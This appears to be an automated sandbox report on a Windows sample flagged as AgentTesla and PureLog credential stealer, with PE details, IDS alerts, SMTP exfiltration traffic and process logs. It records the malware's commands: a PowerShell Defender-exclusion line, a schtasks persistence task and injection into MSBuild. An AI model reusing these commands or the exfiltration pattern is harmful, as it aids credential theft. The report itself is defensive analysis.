Subject Chain	CN=Simon Tatham, O=Simon Tatham, L=Cambridge, S=Cambridgeshire, C=GB
Version:	3
Thumbprint MD5:	DABD77E44EF6B3BB91740FA46696B779
Thumbprint SHA-1:	5B9E273CF11941FD8C6BE3F038C4797BBE884268
Thumbprint SHA-256:	4CD3325617EBB63319BA6E8F2A74B0B8CCA58920B48D8026EBCA2C756630D570
Serial:	7C1118CBBADC95DA3752C46E47A27438

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xbdff4	0x57	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc0000	0x1618	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0xbde00	0x3608
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xc2000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xbc054	0xbc200	623c9640a9095f5029095437d0f6ae44	False	0.9258370535714285	data	7.918332877222406	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xc0000	0x1618	0x1800	7a3405e006545d84cdafc7411f213e1c	False	0.43115234375	data	4.193254440161085	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xc2000	0xc	0x200	da92606bcc3bd156db10d28c43b66ae5	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0xc0130	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4096	0.4692776735459662
RT_GROUP_ICON	0xc11d8	0x14	data	1.1
RT_VERSION	0xc11ec	0x23c	data	0.47202797202797203
RT_MANIFEST	0xc1428	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
02/25/24-21:27:00.324583	TCP	2851779	ETPRO TROJAN Agent Tesla Telegram Exfil	49739	587	192.168.2.4	50.87.139.143
02/25/24-21:27:00.324583	TCP	2855542	ETPRO TROJAN Agent Tesla CnC Exfil Activity	49739	587	192.168.2.4	50.87.139.143
02/25/24-21:27:00.324583	TCP	2855245	ETPRO TROJAN Agent Tesla Exfil via SMTP	49739	587	192.168.2.4	50.87.139.143
02/25/24-21:27:00.324583	TCP	2840032	ETPRO TROJAN Win32/AgentTesla/OriginLogger Data Exfil via SMTP M2	49739	587	192.168.2.4	50.87.139.143
02/25/24-21:27:00.324334	TCP	2030171	ET TROJAN AgentTesla Exfil Via SMTP	49739	587	192.168.2.4	50.87.139.143

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 25, 2024 21:26:47.291099072 CET	49678	443	192.168.2.4	104.46.162.224
Feb 25, 2024 21:26:47.509902000 CET	49675	443	192.168.2.4	173.222.162.32
Feb 25, 2024 21:26:53.870152950 CET	49734	443	192.168.2.4	104.26.13.205
Feb 25, 2024 21:26:53.870260954 CET	443	49734	104.26.13.205	192.168.2.4
Feb 25, 2024 21:26:53.870331049 CET	49734	443	192.168.2.4	104.26.13.205
Feb 25, 2024 21:26:53.887931108 CET	49734	443	192.168.2.4	104.26.13.205
Feb 25, 2024 21:26:53.887969017 CET	443	49734	104.26.13.205	192.168.2.4
Feb 25, 2024 21:26:54.149629116 CET	443	49734	104.26.13.205	192.168.2.4
Feb 25, 2024 21:26:54.149701118 CET	49734	443	192.168.2.4	104.26.13.205
Feb 25, 2024 21:26:54.156229019 CET	49734	443	192.168.2.4	104.26.13.205
Feb 25, 2024 21:26:54.156253099 CET	443	49734	104.26.13.205	192.168.2.4
Feb 25, 2024 21:26:54.156578064 CET	443	49734	104.26.13.205	192.168.2.4
Feb 25, 2024 21:26:54.197307110 CET	49734	443	192.168.2.4	104.26.13.205
Feb 25, 2024 21:26:54.256071091 CET	49734	443	192.168.2.4	104.26.13.205
Feb 25, 2024 21:26:54.301906109 CET	443	49734	104.26.13.205	192.168.2.4
Feb 25, 2024 21:26:54.447940111 CET	443	49734	104.26.13.205	192.168.2.4
Feb 25, 2024 21:26:54.447992086 CET	443	49734	104.26.13.205	192.168.2.4
Feb 25, 2024 21:26:54.448245049 CET	49734	443	192.168.2.4	104.26.13.205
Feb 25, 2024 21:26:54.455437899 CET	49734	443	192.168.2.4	104.26.13.205
Feb 25, 2024 21:26:55.342048883 CET	49735	587	192.168.2.4	50.87.139.143
Feb 25, 2024 21:26:55.525393009 CET	587	49735	50.87.139.143	192.168.2.4
Feb 25, 2024 21:26:55.525474072 CET	49735	587	192.168.2.4	50.87.139.143
Feb 25, 2024 21:26:56.964253902 CET	49738	443	192.168.2.4	104.26.13.205
Feb 25, 2024 21:26:56.964293003 CET	443	49738	104.26.13.205	192.168.2.4
Feb 25, 2024 21:26:56.965058088 CET	49738	443	192.168.2.4	104.26.13.205
Feb 25, 2024 21:26:56.968760967 CET	49738	443	192.168.2.4	104.26.13.205
Feb 25, 2024 21:26:56.968779087 CET	443	49738	104.26.13.205	192.168.2.4
Feb 25, 2024 21:26:57.226022959 CET	443	49738	104.26.13.205	192.168.2.4
Feb 25, 2024 21:26:57.226236105 CET	49738	443	192.168.2.4	104.26.13.205
Feb 25, 2024 21:26:57.228868961 CET	49738	443	192.168.2.4	104.26.13.205
Feb 25, 2024 21:26:57.228888035 CET	443	49738	104.26.13.205	192.168.2.4
Feb 25, 2024 21:26:57.229254007 CET	443	49738	104.26.13.205	192.168.2.4
Feb 25, 2024 21:26:57.276835918 CET	49738	443	192.168.2.4	104.26.13.205
Feb 25, 2024 21:26:57.335527897 CET	49738	443	192.168.2.4	104.26.13.205
Feb 25, 2024 21:26:57.381899118 CET	443	49738	104.26.13.205	192.168.2.4
Feb 25, 2024 21:26:57.403125048 CET	587	49735	50.87.139.143	192.168.2.4
Feb 25, 2024 21:26:57.447323084 CET	49735	587	192.168.2.4	50.87.139.143
Feb 25, 2024 21:26:57.530061007 CET	443	49738	104.26.13.205	192.168.2.4
Feb 25, 2024 21:26:57.530137062 CET	443	49738	104.26.13.205	192.168.2.4
Feb 25, 2024 21:26:57.530184031 CET	49738	443	192.168.2.4	104.26.13.205
Feb 25, 2024 21:26:57.534046888 CET	49738	443	192.168.2.4	104.26.13.205
Feb 25, 2024 21:26:57.575779915 CET	49735	587	192.168.2.4	50.87.139.143
Feb 25, 2024 21:26:58.075812101 CET	49739	587	192.168.2.4	50.87.139.143
Feb 25, 2024 21:26:58.260200024 CET	587	49739	50.87.139.143	192.168.2.4
Feb 25, 2024 21:26:58.260298967 CET	49739	587	192.168.2.4	50.87.139.143
Feb 25, 2024 21:26:59.084813118 CET	587	49739	50.87.139.143	192.168.2.4
Feb 25, 2024 21:26:59.085026026 CET	49739	587	192.168.2.4	50.87.139.143
Feb 25, 2024 21:26:59.267852068 CET	587	49739	50.87.139.143	192.168.2.4
Feb 25, 2024 21:26:59.269817114 CET	49739	587	192.168.2.4	50.87.139.143
Feb 25, 2024 21:26:59.452296019 CET	587	49739	50.87.139.143	192.168.2.4
Feb 25, 2024 21:26:59.453210115 CET	49739	587	192.168.2.4	50.87.139.143
Feb 25, 2024 21:26:59.676248074 CET	587	49739	50.87.139.143	192.168.2.4
Feb 25, 2024 21:26:59.732983112 CET	587	49739	50.87.139.143	192.168.2.4
Feb 25, 2024 21:26:59.733164072 CET	49739	587	192.168.2.4	50.87.139.143
Feb 25, 2024 21:26:59.915421963 CET	587	49739	50.87.139.143	192.168.2.4
Feb 25, 2024 21:26:59.915555954 CET	587	49739	50.87.139.143	192.168.2.4
Feb 25, 2024 21:26:59.915695906 CET	49739	587	192.168.2.4	50.87.139.143
Feb 25, 2024 21:27:00.139399052 CET	587	49739	50.87.139.143	192.168.2.4
Feb 25, 2024 21:27:00.140933037 CET	587	49739	50.87.139.143	192.168.2.4
Feb 25, 2024 21:27:00.141083002 CET	49739	587	192.168.2.4	50.87.139.143
Feb 25, 2024 21:27:00.323395014 CET	587	49739	50.87.139.143	192.168.2.4
Feb 25, 2024 21:27:00.323448896 CET	587	49739	50.87.139.143	192.168.2.4
Feb 25, 2024 21:27:00.324333906 CET	49739	587	192.168.2.4	50.87.139.143
Feb 25, 2024 21:27:00.324583054 CET	49739	587	192.168.2.4	50.87.139.143
Feb 25, 2024 21:27:00.324610949 CET	49739	587	192.168.2.4	50.87.139.143
Feb 25, 2024 21:27:00.324637890 CET	49739	587	192.168.2.4	50.87.139.143
Feb 25, 2024 21:27:00.506613970 CET	587	49739	50.87.139.143	192.168.2.4
Feb 25, 2024 21:27:00.507982016 CET	587	49739	50.87.139.143	192.168.2.4
Feb 25, 2024 21:27:00.556704044 CET	49739	587	192.168.2.4	50.87.139.143
Feb 25, 2024 21:27:35.072607994 CET	49726	80	192.168.2.4	172.64.149.23
Feb 25, 2024 21:27:35.072618961 CET	49725	80	192.168.2.4	172.64.149.23
Feb 25, 2024 21:27:35.194703102 CET	80	49726	172.64.149.23	192.168.2.4
Feb 25, 2024 21:27:35.194808006 CET	49726	80	192.168.2.4	172.64.149.23
Feb 25, 2024 21:27:35.196635008 CET	80	49725	172.64.149.23	192.168.2.4
Feb 25, 2024 21:27:35.196727037 CET	49725	80	192.168.2.4	172.64.149.23
Feb 25, 2024 21:28:06.228970051 CET	49723	80	192.168.2.4	23.61.11.39
Feb 25, 2024 21:28:06.229237080 CET	49724	80	192.168.2.4	23.61.11.8
Feb 25, 2024 21:28:06.324810982 CET	80	49724	23.61.11.8	192.168.2.4
Feb 25, 2024 21:28:06.324875116 CET	80	49723	23.61.11.39	192.168.2.4
Feb 25, 2024 21:28:06.325165033 CET	49723	80	192.168.2.4	23.61.11.39
Feb 25, 2024 21:28:06.325174093 CET	49724	80	192.168.2.4	23.61.11.8
Feb 25, 2024 21:28:38.104163885 CET	49739	587	192.168.2.4	50.87.139.143
Feb 25, 2024 21:28:38.327694893 CET	587	49739	50.87.139.143	192.168.2.4
Feb 25, 2024 21:28:38.488183022 CET	587	49739	50.87.139.143	192.168.2.4
Feb 25, 2024 21:28:38.488291979 CET	49739	587	192.168.2.4	50.87.139.143
Feb 25, 2024 21:28:38.488507032 CET	49739	587	192.168.2.4	50.87.139.143
Feb 25, 2024 21:28:38.670562983 CET	587	49739	50.87.139.143	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 25, 2024 21:26:53.727617025 CET	55006	53	192.168.2.4	1.1.1.1
Feb 25, 2024 21:26:53.850768089 CET	53	55006	1.1.1.1	192.168.2.4
Feb 25, 2024 21:26:55.080120087 CET	62118	53	192.168.2.4	1.1.1.1
Feb 25, 2024 21:26:55.340964079 CET	53	62118	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Feb 25, 2024 21:26:53.727617025 CET	192.168.2.4	1.1.1.1	0xc872	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Feb 25, 2024 21:26:55.080120087 CET	192.168.2.4	1.1.1.1	0x34ca	Standard query (0)	mail.elec-qatar.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Feb 25, 2024 21:26:53.850768089 CET	1.1.1.1	192.168.2.4	0xc872	No error (0)	api.ipify.org		104.26.13.205	A (IP address)	IN (0x0001)	false
Feb 25, 2024 21:26:53.850768089 CET	1.1.1.1	192.168.2.4	0xc872	No error (0)	api.ipify.org		172.67.74.152	A (IP address)	IN (0x0001)	false
Feb 25, 2024 21:26:53.850768089 CET	1.1.1.1	192.168.2.4	0xc872	No error (0)	api.ipify.org		104.26.12.205	A (IP address)	IN (0x0001)	false
Feb 25, 2024 21:26:55.340964079 CET	1.1.1.1	192.168.2.4	0x34ca	No error (0)	mail.elec-qatar.com		50.87.139.143	A (IP address)	IN (0x0001)	false
Feb 25, 2024 21:27:10.661001921 CET	1.1.1.1	192.168.2.4	0xd1d1	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Feb 25, 2024 21:27:10.661001921 CET	1.1.1.1	192.168.2.4	0xd1d1	No error (0)	fp2e7a.wpc.phicdn.net		192.229.211.108	A (IP address)	IN (0x0001)	false
Feb 25, 2024 21:27:23.339190006 CET	1.1.1.1	192.168.2.4	0xb39f	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Feb 25, 2024 21:27:23.339190006 CET	1.1.1.1	192.168.2.4	0xb39f	No error (0)	fp2e7a.wpc.phicdn.net		192.229.211.108	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

api.ipify.org

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49734	104.26.13.205	443	7264	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-25 20:26:54 UTC	155	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: api.ipify.org Connection: Keep-Alive
2024-02-25 20:26:54 UTC	211	IN	HTTP/1.1 200 OK Date: Sun, 25 Feb 2024 20:26:54 GMT Content-Type: text/plain Content-Length: 12 Connection: close Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 85b2af99bd588227-IAD
2024-02-25 20:26:54 UTC	12	IN	Data Raw: 38 39 2e 31 34 39 2e 31 38 2e 32 30 Data Ascii: 89.149.18.20

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49738	104.26.13.205	443	7644	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe

Timestamp	Bytes transferred	Direction	Data
2024-02-25 20:26:57 UTC	155	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: api.ipify.org Connection: Keep-Alive
2024-02-25 20:26:57 UTC	211	IN	HTTP/1.1 200 OK Date: Sun, 25 Feb 2024 20:26:57 GMT Content-Type: text/plain Content-Length: 12 Connection: close Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 85b2afacffaa2093-IAD
2024-02-25 20:26:57 UTC	12	IN	Data Raw: 38 39 2e 31 34 39 2e 31 38 2e 32 30 Data Ascii: 89.149.18.20

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Feb 25, 2024 21:26:57.403125048 CET	587	49735	50.87.139.143	192.168.2.4	220-box2248.bluehost.com ESMTP Exim 4.96.2 #2 Sun, 25 Feb 2024 13:26:57 -0700 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Feb 25, 2024 21:26:59.084813118 CET	587	49739	50.87.139.143	192.168.2.4	220-box2248.bluehost.com ESMTP Exim 4.96.2 #2 Sun, 25 Feb 2024 13:26:58 -0700 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Feb 25, 2024 21:26:59.085026026 CET	49739	587	192.168.2.4	50.87.139.143	EHLO 965543
Feb 25, 2024 21:26:59.267852068 CET	587	49739	50.87.139.143	192.168.2.4	250-box2248.bluehost.com Hello 965543 [89.149.18.20] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-AUTH PLAIN LOGIN 250-STARTTLS 250 HELP
Feb 25, 2024 21:26:59.269817114 CET	49739	587	192.168.2.4	50.87.139.143	AUTH login bW9oYW1tZWQuYWJyYXJAZWxlYy1xYXRhci5jb20=
Feb 25, 2024 21:26:59.452296019 CET	587	49739	50.87.139.143	192.168.2.4	334 UGFzc3dvcmQ6
Feb 25, 2024 21:26:59.732983112 CET	587	49739	50.87.139.143	192.168.2.4	235 Authentication succeeded
Feb 25, 2024 21:26:59.733164072 CET	49739	587	192.168.2.4	50.87.139.143	MAIL FROM:<mohammed.abrar@elec-qatar.com>
Feb 25, 2024 21:26:59.915555954 CET	587	49739	50.87.139.143	192.168.2.4	250 OK
Feb 25, 2024 21:26:59.915695906 CET	49739	587	192.168.2.4	50.87.139.143	RCPT TO:<richcompaniesltd@gmail.com>
Feb 25, 2024 21:27:00.140933037 CET	587	49739	50.87.139.143	192.168.2.4	250 Accepted
Feb 25, 2024 21:27:00.141083002 CET	49739	587	192.168.2.4	50.87.139.143	DATA
Feb 25, 2024 21:27:00.323448896 CET	587	49739	50.87.139.143	192.168.2.4	354 Enter message, ending with "." on a line by itself
Feb 25, 2024 21:27:00.324637890 CET	49739	587	192.168.2.4	50.87.139.143	.
Feb 25, 2024 21:27:00.507982016 CET	587	49739	50.87.139.143	192.168.2.4	250 OK id=1reL5Q-0044j4-0l
Feb 25, 2024 21:28:38.104163885 CET	49739	587	192.168.2.4	50.87.139.143	QUIT
Feb 25, 2024 21:28:38.488183022 CET	587	49739	50.87.139.143	192.168.2.4	221 box2248.bluehost.com closing connection

Target ID:	0
Start time:	21:26:49
Start date:	25/02/2024
Path:	C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe
Imagebase:	0x9e0000
File size:	791'560 bytes
MD5 hash:	6E7DF9FAE35366F13F6D83E037321608
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1662329813.00000000032CF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1667293685.0000000007D80000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1662329813.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1662329813.0000000002F32000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1662329813.0000000003308000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1663132505.0000000004922000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1663132505.0000000004922000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	21:26:51
Start date:	25/02/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe
Imagebase:	0xe10000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	21:26:51
Start date:	25/02/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	21:26:51
Start date:	25/02/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jYRIGnZlROed" /XML "C:\Users\user\AppData\Local\Temp\tmp919E.tmp
Imagebase:	0xe90000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	21:26:51
Start date:	25/02/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	21:26:51
Start date:	25/02/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Imagebase:	0x200000
File size:	262'432 bytes
MD5 hash:	8FDF47E0FF70C40ED3A17014AEEA4232
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	21:26:51
Start date:	25/02/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Imagebase:	0xa0000
File size:	262'432 bytes
MD5 hash:	8FDF47E0FF70C40ED3A17014AEEA4232
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	21:26:51
Start date:	25/02/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Imagebase:	0x290000
File size:	262'432 bytes
MD5 hash:	8FDF47E0FF70C40ED3A17014AEEA4232
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.1674653824.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.1674653824.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000002.1678075288.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.1678075288.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000008.00000002.1678075288.0000000002C1C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	21:26:52
Start date:	25/02/2024
Path:	C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe
Imagebase:	0xc20000
File size:	791'560 bytes
MD5 hash:	6E7DF9FAE35366F13F6D83E037321608
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000009.00000002.1695168637.00000000031BE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000009.00000002.1695168637.000000000317B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000002.1697688935.000000000438B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000009.00000002.1697688935.000000000438B000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Joe Sandbox ML Detection: 29%, ReversingLabs Detection: 42%, Virustotal, Browse
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	21:26:53
Start date:	25/02/2024
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff693ab0000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	21:26:54
Start date:	25/02/2024
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jYRIGnZlROed" /XML "C:\Users\user\AppData\Local\Temp\tmp9C4C.tmp
Imagebase:	0xe90000
File size:	187'904 bytes
MD5 hash:	48C2FE20575769DE916F48EF0676A965
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	21:26:54
Start date:	25/02/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

